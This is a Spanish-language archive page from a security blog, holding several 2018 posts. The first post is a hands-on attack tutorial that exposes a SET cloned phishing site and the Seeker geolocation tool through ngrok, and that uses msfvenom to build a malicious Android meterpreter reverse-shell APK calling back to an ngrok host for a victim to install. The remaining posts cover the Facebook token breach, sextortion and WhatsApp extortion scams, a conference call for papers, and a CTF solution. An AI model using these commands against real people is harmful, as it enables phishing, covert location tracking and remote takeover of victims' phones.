Archive for September 2018

Hacking con Ngrok: SET – Seeker y Metasploit fuera de LAN

Hola queridos lectores de Snifer@L4b’s, hablando un poco con mi amigo Snifer me pidio que hiciera un post para su blog, así que vamos a ellos y en esta oportunidad vamos hablar de como sacar nuestros ataques afuera de LAN haciendo uso de Ngrok.

Ox1. ¿Qué es Ngrok? 

Es una herramienta con la que podemos crear un túnel accesible a través de un dominio que nos asigna la propia aplicación, para así acceder a un servidor local. 

 Vamos a su sitio web https://ngrok.com/ y nos registramos, y descargamos su cliente.

Nota: En la versión gratuita esta url se genera cada que ejecutemos ngrok , sin embargo con la opción de pago podemos configurar subdominios permanentes y otras opciones mas avanzadas que harán mas fácil nuestro trabajo.

0x2. Instalación 

Luego de descargar nuestro cliente vamos a conectarnos a nuestra cuenta con el authtoken que se genera cuando ingresamos a nuestra cuenta.

$ ./ngrok authtoken TOKEN 

0x3. SET (social engineer toolkit) con Ngrok 

Luego de la instalación de Ngrok vamos a empezar a jugar realizando pruebas con una herramienta que ya todos conocemos para realizar ataques de ingeniería social, vamos a realizar el ejemplo más clásico que sería clonar un sitio web.

Iniciamos nuestro servicio de apache

service apache2 start

Para ello vamos a crear un tuner http con ngrok que apunte al puerto 80.

./ngrok http 80

Ahora vamos habilitar que apache2 funcione con set en el archivo local /etc/setoolkit/set.config. Buscamos la linea

 APACHE_SERVER=OFF  

y cambiamos OFF por ON, guardamos los cambios y procedemos a ejecutar setoolkit y a utilizar el módulo de Site Cloner. 
Procedemos a la configuración del módulo de la siguiente forma 

Cuando se crea el tunel genera un index.html por default, asi que se recomiendo renombrar el index2.html que contiene el sitio web clonado. 

Fuck yeah! cuando ingresamos a la url de ngrok obversvamos nuestro sitio web clonado.

0x4. Geolocalización de Dispositivos 

Continuando con nuestro post, ahora veremos seeker una herramienta escrita en python que ya incluye ngrok con la cual podemos geolocalizar dispositivos. Con esta herramienta podemos extraer la siguiente información si el visitante acepta los permisos que la plataforma web pide.
  • Longitud
  • Latitud
  • Exactitud

Sin permisos del usuario podemos obtener la siguiente información.

  • Sistema operativo
  • Plataforma
  • Número de núcleos de CPU
  • Cantidad de RAM – Resultados aproximados
  • Resolución de la pantalla
  • Información de GPU
  • Nombre y versión del navegador
  • Dirección IP pública

Instalación: 

Clonamos el repositoria de git

git clone https://github.com/thewhiteh4t/seeker.git

Ejecutamos el script de instalación

./install.sh

Una vez instalada todas las dependencias, unicamente corremos en terminal el comando python seeker.py

Ahora solo queda enviar la url generada con la herramienta a nuestros amigos…

Nota: La herraminta crea un server php en el puerto 80, así que si tienen corriendo apache2 deben detenerlo.

0x5 Metasploit con Ngrok 

Como ultimo ejemplo vamos a realizar un ataque con msfvemon, en este caso usaremos el ataque mas simple generando un backdoor y enviando a la victima. Como en el ejemplo con setoolkit vamos a crear un tunel solo que en este caso sera TCP en el cual se va apuntar al puerto 1337.

./ngrok tcp 1337

Como se observa tenemos tcp://0.tcp.ngrok.io:14422

0.tcp.ngrok.io  - Host apuntando a localhost
14422 - puerto apuntado al puerto 1337

Generando nuestro apk malicioso.14422

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=14422 R > /root/Sniferlab.apk 

Ahora pondremos a la escucha nuestro handler

y cuando la victima instale el apk malicioso…

Aporte realizado por Cesar aka. @Stuxnet

Leer artículo original: Hacking con Ngrok: SET – Seeker y Metasploit fuera de LAN

Hack a Facebook: 50 millones cuentas – lo que debes saber

El día de ayer muchos usuarios sin darse cuenta que sucedía simplemente tuvieron que ingresar nuevamente sus usuarios y contraseña porque Facebook había cerrado su sesión. ¿Pero que hubo detrás de esto?

Una Brecha de seguridad fue la la razón. Facebook forzó el cierre de sesión de mas de 90 millones de usuarios como medida de seguridad ante tal situación.

Facebook Hacked.

En un comunicado de seguridad publicado el día viernes 28 de septiembre, Facebook reveló que su equipo de seguridad había descubierto el ataque hace 3 días atrás, y que se mantienen investigando el incidente.

El hacker o grupo de hackers explotó un vulnerabilidad de día zero ( Zero Day Exploit) en la red social que permitió a los atacantes la obtener y robar las tokens de acceso secretas  (secret access tokens) de mas de 50 millones de cuentas. Por esta misma razón y como precaución el gigante de la red social realizó un reset de las “access tokens” de más de 90 millones de usuarios.


Algunos detalles de la Brecha de Seguridad.


Se explotaron 3 vulnerabilidades en Facebook en conjunto. 

El primer bug ofreció de forma incorrecta a los usuarios, la opción de subir un video dentro de ciertas publicaciones que permite a las personas desear “Feliz Cumpleaños” a sus amigos cuando acceden a la página “Ver Como / View As”.

Al mismo tiempo el segundo error se encontraba en el gestor de subida de video, el cual generó incorrectamente un token de acceso que tenia permiso para iniciar sesión en la aplicación móvil de Facebook.

Finalmente el tercer bug fue que el token generado no era para ti como espectador, sino que fue generado para el usuario al cual estabas buscando. Así los atacantes podían obtener los Tokens de los usuarios a los cuales estaban simulando gracias a la característica “Ver Como”.

Access Tokens y lo que debemos saber del Ataque.

Para comprender de que se trata y como afecta esta brecha de seguridad a los usuarios de Facebook, es que primero debemos hablar del “Access Tokens”.

Los “Access Tokens” son equivalentes a credenciales de acceso, es decir una llave digital que una vez que inicias sesión con tu usuario y contraseña, se genera esta Access Token que es el responsable de mantener en Facebook la sesión iniciada y que no sea necesario estar ingresando el usuario y contraseña cada vez que utilizas la aplicación.

Ya teniendo claro el concepto de Access Token de forma básica. En el ataque a Facebook el atacante pudo obtener 50 millones de estas llaves digitales, las cuales le permitirían obtener acceso a información sensible de cada cuenta comprometida sin necesidad de saber la contraseña de inicio de tu cuenta o saber tu código de autenticación de dos factores.


“Tu contraseña no fue revelada, con el “Access Tokens” robado, no era necesaria.

Finalmente el día de ayer, Facebook realizó un reset de alrededor de 50 millones de Access Tokens afectadas y al mismo tiempo de forma preventiva de otras 40 millones mas. Como resultado de lo anterior es que alrededor de 90 millones de usuarios tendrán que volver a iniciar su sesión en Facebook o en cualquiera de sus aplicaciones que usen el Login de Facebook. Después de haber hecho dicho inicio de sesión los usuarios recibiran una notificación en la parte superior de sus Feed News explicando lo sucedido.


Fuente tomada desde: https://newsroom.fb.com/news/2018/09/security-update/



Leer artículo original: Hack a Facebook: 50 millones cuentas – lo que debes saber

"Sextorsión" en Chile, envío de correos falsos solicitando dinero en Bitcoins

“Sextorsión”


Sextorsión o extorsión sexual es una forma de explotación sexual en la cual  una persona es chantajeada con una imagen o vídeo de si misma desnuda o realizando actos sexuales que generalmente es compartida con fines de que se haga viral. La víctima es obligada a mantener el abuso, ya sea: mantener relaciones sexuales, entregar más material erótico o pornográfico, dinero o algún otro beneficio, bajo la continua amenaza de difundir las imágenes originales sino accede al chantaje.


“Esta sucediendo en Chile”


El día de ayer se comunicaron con nuestro soporte, una empresa de abogados a los cuales prestamos servicios. El caso era que habían recibido un correo desde una de sus propias “cuentas de correo”, en el cual estaban solicitando dinero, afirmando que habían accedido por completo a los dispositivos y que por esa razón eran capaces mandar un correo desde su propia cuenta. Por otro lado, agregan que instalaron malware en cierta página de videos para adultos y explican que por haber visitado dicho sitio se infectaron del malware y ahora mediante esta infección lograron hacer registro de sus teclas -Keylogger- lo cual proporcionó acceso a su pantalla y cámara web. Además explican que obtuvieron acceso de todos sus contactos de Messenger, redes sociales y correo electrónico.

“Registro de vídeo, chantaje y Bitcoins”

Como parte de la extorsión indican que realizaron un video doble pantalla. Una parte del de esta material mostraría el video que supuestamente estabas viendo en tu pantalla ( Sitio Video para adultos) y la otra parte mostraría una captura de imagen realizada mediante la propia cámara web de la víctima. 

La víctima debe hacer un pago de $250 mediante Bitcoins (BTC)  e indican que la víctima debe buscar en google como comprar bitcoins, entregando la dirección BTC donde quieren que sea enviado el dinero con el fin de no enviar la grabación del supuesto video a todos sus contactos, compañeros de trabajo y otros.

El correo:



Análisis del Caso:

    • El hecho que el remitente de correo sea la dirección de la víctima en NINGÚN caso confirma que el atacante tenga acceso del correo. Existen formas bastante sencillas de falsear el remitente -email spoofing- .
    • Utilizan temas comunes y de uso tan frecuente por el público como el visitar páginas de adultos, para así crear un ambiente de realidad e incertidumbre hacia la víctima.
    • Utilizan términos informáticos, para confundir y establecer una posición de “conocimiento técnico” que permita obtener una posición privilegiada y superior sobre la víctima para llevar a cabo la extorsión.
    • Apelan al miedo del estigma social, sobre la navegación por sitios de adultos, aprovechando la alta probabilidad de que alguna de sus víctimas haya visitado un sitio de adultos en el último tiempo. Al mismo tiempo de verse expuesto en Internet en una grabación en torno a un momento íntimo.

  • Aclaraciones Finales:

    • Parte fundamental del ataque es mantener con temor a la víctima haciendo creer que todo lo dicho en ese correo es real y no solo parte de un engaño totalmente ficticio.
    • El atacante NO tiene acceso a tus dispositivos.
    • El atacante NO tiene acceso a tus correos, solo falseó el remitente.
    • El atacante NO tiene grabaciones de tu webcam o pantalla.
    • El atacante NO sabe si tu visitaste o no un sitio para adultos, solo juega con las probabilidades.
    • Por último, no debes pagar el dinero solicitado porque los atacantes solo están jugando con las probabilidades y tu mente. Basado en el hecho de “el que nada hace, nada teme”. 
    • Y si así fuera que visitaste un sitio de adultos e hiciste cosas por las cuales podrías sentir pudor frente a la cámara, recuerda que ellos no tienen acceso a tu equipo. Y si alguna vez sucede que por otro tipo de ataque tuvieran acceso a tu cámara web, nadie puede asegurarte que el pago de dinero logré que se detengan en cuanto a la extorsión, es mas, lo más probable es que sigan solicitando dinero sin fin.


Al cierre de esta publicación

Al cierre de esta publicación ya se han recibido 5 transacciones de dinero hacia esta dirección de Bitcoins. Lo cual explica que 5 personas han realizado el pago mediante esta técnica de engaño. El monto al cierre de esta publicación por las 5 transacciones de Bitcoins asciende a 0.13293496 Bitcoins, lo que es equivalente a 569.277 pesos chilenos


Leer artículo original: "Sextorsión" en Chile, envío de correos falsos solicitando dinero en Bitcoins

Estafa a través de WhatsApp y Facebook relacionada con "Foto de Menores" en Chile

Esta nueva metodología – Cuento del tío 2.0 – consiste en contactar usuarios mediante Facebook para luego vía WhatsApp enviar fotos de supuestas menores de edad a la víctima, posteriormente comienzan a extorsionarlos por posesión de pornografía infantil.


____________________________________________________________________________________________


Este nueva técnica esta siendo utilizada en Chile. Mediante el uso de redes sociales, específicamente Facebook y WhatsApp es que los estafadores toman contacto con sus víctimas, envían fotos de mujeres desnudas supuestamente menores de edad para luego extorsionarlos con el fin de obtener dinero.

Un estudiante universitario de 27 años realizó la denuncia tras percatarse que estaba siendo víctima de una estafa.

Según lo denunciado por el estudiante a la Policía de Investigaciones de Chile (PDI), una mujer lo habría contactado por Facebook y tras una breve conversación compartieron sus números telefónicos para continuar comunicándose por WhatsApp, donde el joven recibe fotos de índole sexual supuestamente de ella.

Posterior a eso, el joven recibe un llamado de un supuesto oficial de la PDI quien le informó que las fotografías recibidas corresponden en realidad a una menor de 14 años de edad y que el padre lo iba a denunciar, para evitar la denuncia debía realizar un depósito en una cuenta bancaria por la suma de 500.000

EL joven universitario depositó 200.000 y acudió a la Brigada de Investigación Criminal, donde confirmo lo que sospechaba: Había sido víctima de un nuevo cuento del tío.

Detienen a los Responsables

A partir de la denuncia es que la PDI logró dar con el paradero de los responsables. Se trataba de un reo de la cárcel de Valparaíso y su primo quien estaba libre con residencia en Santiago, dueño de la cuenta bancaria donde fue enviado el dinero.


Leer artículo original: Estafa a través de WhatsApp y Facebook relacionada con "Foto de Menores" en Chile

Call For Papers Patagonia Hacking, capítulo Temuco

¿Te gustaría dar una charla y compartir tu experiencia en el sur de Chile? El capítulo Temuco de Patagonia Hacking se realizará el 15 y 16 de noviembre. Las postulaciones para que envies tu investigación o charla ya se encuentran abiertas.

Patagonia Hacking es una instancia para compartir experiencias y conocimientos en relación a seguridad informática y hacking. Por primera vez, se realizará en dos ciudades de Chile. El 8 y 9 de noviembre en Punta Arenas y el 15 y 16 de noviembre en Temuco. Los speakers y talleres para el capítulo de Punta Arenas ya se encuentra completo, sin embargo, para Temuco se acaba de abrir un CFP para que puedas enviar tu investigación. El plazo es hasta el 29 de septiembre.

Temuco

Este es el anuncio oficial:

Si eres investigador/a en seguridad y quieres mostrar tu trabajo, Patagonia Hacking es una buena instancia para lograrlo.

Temáticas
• Pentesting. Ingeniería Social, Hardware Hacking.
• Seguridad en Redes, Seguridad Web, Seguridad Móviles, Seguridad en Entornos Industriales. Seguridad en la Nube, Seguridad en Tecnologías Emergentes.
• Vulnerabilidades 0-day,Exploiting.
• Criptografía, Computación Forense, Desarrollo Seguro.
• Seguridad en IoT.

Para enviar tu paper a Patagonia hacking necesitas:

• Enviar tu paper al siguiente correo contacto@patagoniasec.cl
• Plazo Máximo para recepción de papers: 29 de Septiembre de 2018
• Anuncio de papers aceptados 01 de Octubre de 2018
• En caso que su paper sea aceptado el comité académico se pondrá en contacto con Usted y le indicara los pasos a seguir

Leer artículo original: Call For Papers Patagonia Hacking, capítulo Temuco

Solución al Reto: DarkArmy ataca la 8.8 Bolivia

Lastimosamente nadie gano la entrada, respecto al reto que lanzamos el mes de Agosto para el evento de la 8.8 que se realizara este Viernes 14 y 15 de Septiembre a continuación detallo cual era el proceso para resolver el reto.

https://1.bp.blogspot.com/-juVBR21jmhY/W3s6tXmQi_I/AAAAAAAAJmw/TbkAkE1w9MoV8km6Io2V5ebEiZ5PltOfwCLcBGAs/s1600/SniferL4bs_8dot8_Reto.bmp

Muchas gracias a todos los que participarón y estuvierón de pie en el cañon espero que cuando se tengan retos que no vengan con premio igual anden, asi que sin mas vueltas con la  Solución. Lo primero que teniamos como referencia es el siguiente contenido.

Además de como nunca faltan en las entradas alguna frase, en este caso tenía mucho sentido con el reto para afrontarlo y dar con la solución. Una vez descargamos el fichero, con la información obtenida procedemos a extraer y nos brinda dos ficheros “Whiterose.txt” y “white.exe”.

Al abrir el fichero “Whiterose.txt” tenemos la siguiente frase y codigo binario.

"Si te vas, te conviertes en un cero. Si te quedas, si quieres cambiar el mundo. Te conviertes en un uno."

01100001 01001000 01010010 00110000 01100011 01001000 01001101 00110110 01001100 01111001 00111001 00110101 01100010 00110011 01010110 00110000 01100100 01010011 00110101 01101001 01011010 01010011 00111001 01000110 01010011 01101100 01001010 01111010 01011010 00110010 01010010 01011001 01100001 00110000 01010001 01111001 01010110 01010001 01101111 00111101

Entonces procedemos a convertirlo  y obtenemos el texto en base64.

aHR0cHM6Ly95b3V0dS5iZS9FSlJzZ2RYa0QyVQo=

Al proceder a descifrarlo nos brinda un enlace a Youtube , en el cual es una escena de Mr Robot cuando Eliot comenta sobre el Hackeo al FBI. Enlace a Youtube: https://youtu.be/EJRsgdXkD2U

Si vemos en la descripción esta el texto cifrado por lo tanto, toca obtenerlo en claro en este punto varios estuvieron peleando con obtener la URL correcta ya que no se realizaba el desplazamiento de los numeros, en la web Cryptii si ingresamos el texto no da la URL correcta que es la siguiente:

WhiteRose tienes los datos, cuando los descargues avisa para borrar y no dejar información suelta. /file/u0w9m62elbusc25/EmpireAttack.zip Atte;mediafire
Una vez realizamos el proceso correctamente tenemos para descargar el fichero EmpireAttack.zip.

Al descomprimir nos quedan ahora 2 ficheros por analizar el audio “EmpireAttack.wav” el cual lo obtenemos del deepsound y el “White.exe”

El fichero ejecutable “white.exe” tenia como unico objetivo marear y que se pierda el tiempo en un análisis ya que podría tener algun BoF, pero lo único que nos interesa es ver los datos que estan en el mismo podemos hacerlo con un editor hexadecimal y tenemos lo siguiente.

El código binario que se tiene es el siguiente el cual al obtenerlo en texto tenemos base64_esta_la_llave con esto podemos realizar una busqueda de referencia en base64.

Mas abajo del codigo binario tenemos texto que se debe de tratar para tenerlo correctamente y descifrar en base64.

Obtenemos la llave: EmpireFramework (que por cierto viene en relación a la charla que daré en el evento.)

Ahora el audio es un chiptune por decirlo de Star Wars, en este punto podriamos analizar y ver si lleva algo de esteganografia en el mismo embebiendo algun fichero.

Como sabran Elliot hace uso de una herramienta DeepSound para guardar su información en archivos de audio, y como la temática de este reto era la misma ya venia derecho el uso de la misma les hablo de deepsound. (Quizas no sea  legal o igualitario para los que no vierón la serie.)

Al abrir el fichero nos pide contraseña, evidentemente podria ser “EmpireFramework”, algunos se que generaron un diccionario pero la pista para resolver se encontraba en el mismo video si lo llegan a ver con detalle en diversos fotogramas daba una pista, dejo en una imagen los datos que se brindaba así tambien los segundos donde se muestra el texto.

00:00 La
00:04 Password
00:08 es
00:15 el
00:21 canal

Se que algunos llegarón a este punto y se estancaron, pusieron el canal del blog en Telegram, el canal de Youtube asi que era el canal de IRC donde se ve en el segundo 00:15 #th3g3ntl3man

Al ingresar la password en deepsound nos extrae el fichero de texto Information.txt

El mismo contiene el siguiente texto:

Ahora si llegamos a visualizar con detalle se tiene algunas letras mayúsculas,  ESASLPB evidentemente algunas son forzosas asi que extrayendo nos queda ESA ordenando nos da AES, el cifrado usado del texto y la llave como ya la tenemos es la primera que obtuvimos EmpireFramework al descifrar obtenemos el medio de contacto por Telegram y el infiltrado.

Espero les agrade y pasaron un buen momento tratando de resolverlo, por mi parte nos vemos en el evento, en el cual estare dando la charla de Post & Explotación con Empire donde veremos parte del framework y además el potencial que esta llegando a tener PowerShell para la realización de diferentes ataques bajo windows. 
Pero aquí no termina, me gustaria que alguien gane la entrada por lo tanto pondremos algunas reglas básicas para este sorteo. 
1.- Si eres estudiante de la universidad o Colegio puedes participar (se validara con el ganador).
2.- Si estas fuera de La Paz, es decir en cualquier otro departamento pero te gustaria venir, y tener esa ayuda con el ticket de ingreso puedes participar.
3.- Realizar un tweet con el Hashtag #8dot8BoliviaRetoSniferL4bs solo una vez, hasta el dia de mañana jueves a  medio día, y entre los que lo realicen me contacto con la persona que salga ganadora eso si debe de cumplir con los requisitos.

Una lastima que nadie se animó a lanzar el tweet, hubiese sido el único ganador, gracias a todos por participar.  Dos personas  resolvieron el reto ambos dando pistas, uno mas que el otro eso si fuera de Bolivia cuando recuerde los nicks o me digan los agregamos.

Nadie tiene más amor que el que da su vida por los que ama – (Paul Claudel)

Regards,
Snifer

Leer artículo original: Solución al Reto: DarkArmy ataca la 8.8 Bolivia